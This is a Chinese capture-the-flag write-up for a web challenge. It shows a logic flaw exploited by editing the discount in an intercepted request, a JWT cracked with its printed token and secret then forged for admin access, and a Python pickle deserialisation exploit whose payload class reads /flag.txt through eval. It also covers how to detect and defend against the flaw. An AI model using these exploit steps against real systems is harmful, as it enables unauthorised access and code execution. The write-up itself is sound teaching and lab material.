0x01:抓包薅羊毛邏輯漏洞
提示我們買lv6,根據源碼我們要找到lv6,寫個v腳本:
import requests
url="http://6e7db183-764d-4afc-bdbb-b70791536e4a.node3.buuoj.cn/shop?page="
for i in range(0,2000):
r=requests.get(url+str(i))
if 'lv6.png' in r.text:
print (i)
break
找到lv6在180 直接跳轉,發現買不起,抓包
修改折扣 購買成功,提示需要admin權限
0x02 JWT偽造
先來了解JWT:
** JSON Web Token**
JSON Web Token (JWT)是一個開放標准(RFC 7519),它定義了一種緊湊的、自包含的方式,用於作為JSON對象在各方之間安全地傳輸信息。該信息可以被驗證和信任,因為它是數字簽名的。
JSON Web Token由三部分組成,它們之間用圓點(.)連接。這三部分分別是:HeaderPayloadSignature
JWT與Session的差異
相同點是,它們都是存儲用戶信息;然而,Session是在服務器端的,而JWT是在客戶端的。Session方式存儲用戶信息的最大問題在於要占用大量服務器內存,增加服務器的開銷。而JWT方式將用戶狀態分散到了客戶端中,可以明顯減輕服務端的內存壓力。Session的狀態是存儲在服務器端,客戶端只有session id;而Token的狀態是存儲在客戶端。
詳情鏈接
https://www.cnblogs.com/cjsblog/p/9277677.html
對JWT直接base64解密:
{"alg":"HS256","typ":"JWT"}{"username":"777"}Ù èø;Å 7
sêév»y">ĹïK¿êâ8
我們先使用c-jwt-cracker破解密鑰
結果:
./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ijc3NyJ9.Ftkg6Pg7x_Qc3CK5z6ul2u3kiPsQf_-ue9Lv47q4hA4
Secret is "1Kun"
密鑰
1Kun
直接在網站修改
https://jwt.io/
偽造后題目彈出來源碼
0x03 python反序列化
審計源碼
源代碼里面有一個hint,unicode編碼。解碼后提示我們有后門
查找后門
在admin.py
from sshop.base import BaseHandler
import pickle
import urllib
class AdminHandler(BaseHandler):
@tornado.web.authenticated
def get(self, *args, **kwargs):
if self.current_user == "admin":
return self.render('form.html', res='This is Black Technology!', member=0)
else:
return self.render('no_ass.html')
@tornado.web.authenticated
def post(self, *args, **kwargs):
try:
become = self.get_argument('become')
p = pickle.loads(urllib.unquote(become))
return self.render('form.html', res=p, member=1)
except:
return self.render('form.html', res='This is Black Technology!', member=0)
漏洞點:
pickle反序列化
pickle提供了一個簡單的持久化功能。可以將對象以文件的形式存放在磁盤上。
pickle模塊只能在python中使用,python中幾乎所有的數據類型(列表,字典,集合,類等)都可以用pickle來序列化,
pickle序列化后的數據,可讀性差,人一般無法識別。
p = pickle.loads(urllib.unquote(become))
urllib.unquote:將存入的字典參數編碼為URL查詢字符串,即轉換成以key1 = value1 & key2 = value2的形式pickle.loads(bytes_object): 從字節對象中讀取被封裝的對象,並返回我看了師傅們的博客之后的理解就是,我們構建一個類,類里面的__reduce__python魔術方法會在該類被反序列化的時候會被調用Pickle模塊中最常用的函數為:
(1)pickle.dump(obj, file, [,protocol])
函數的功能:將obj對象序列化存入已經打開的file中。
參數講解:
obj:想要序列化的obj對象。
file:文件名稱。
protocol:序列化使用的協議。如果該項省略,則默認為0。如果為負值或HIGHEST_PROTOCOL,則使用最高的協議版本。
(2)pickle.load(file)
函數的功能:將file中的對象序列化讀出。
參數講解:
file:文件名稱。
(3)pickle.dumps(obj[, protocol])
函數的功能:將obj對象序列化為string形式,而不是存入文件中。
參數講解:
obj:想要序列化的obj對象。
protocal:如果該項省略,則默認為0。如果為負值或HIGHEST_PROTOCOL,則使用最高的協議版本。
(4)pickle.loads(string)
函數的功能:從string中讀出序列化前的obj對象。
參數講解:
string:文件名稱。
【注】 dump() 與 load() 相比 dumps() 和 loads() 還有另一種能力:dump()函數能一個接着一個地將幾個對象序列化存儲到同一個文件中,隨后調用load()來以同樣的順序反序列化讀出這些對象。而在__reduce__方法里面我們就進行讀取flag.txt文件,並將該類序列化之后進行URL編碼
檢測反序列化方法:
全局搜索Python代碼中是否含有關鍵字類似“import cPickle”或“import pickle”等,若存在則進一步確認是否調用cPickle.loads()或pickle.loads()且反序列化的參數可控。
防御方法
1、用更高級的接口__getnewargs()、__getstate__()、__setstate__()等代替__reduce__()魔術方法;
2、進行反序列化操作之前,進行嚴格的過濾,若采用的是pickle庫可采用裝飾器實現。
0x04解題
本題中我們使用 **reduce **
方法
當__reduce__被定義之后,該對象被Pickle時就會被調用我們這里的eval用於重建對象的時候調用,即告訴python如何pickle他們供eval使用的即打開的文件flag.txt其他的參數我們可以不填
EXP:
import pickle
import urllib
class payload(object):
def __reduce__(self):
return (eval, ("open('/flag.txt','r').read()",))
a = pickle.dumps(payload())
a = urllib.quote(a)
print a
將生成的
payload傳給become
得到flag
參考鏈接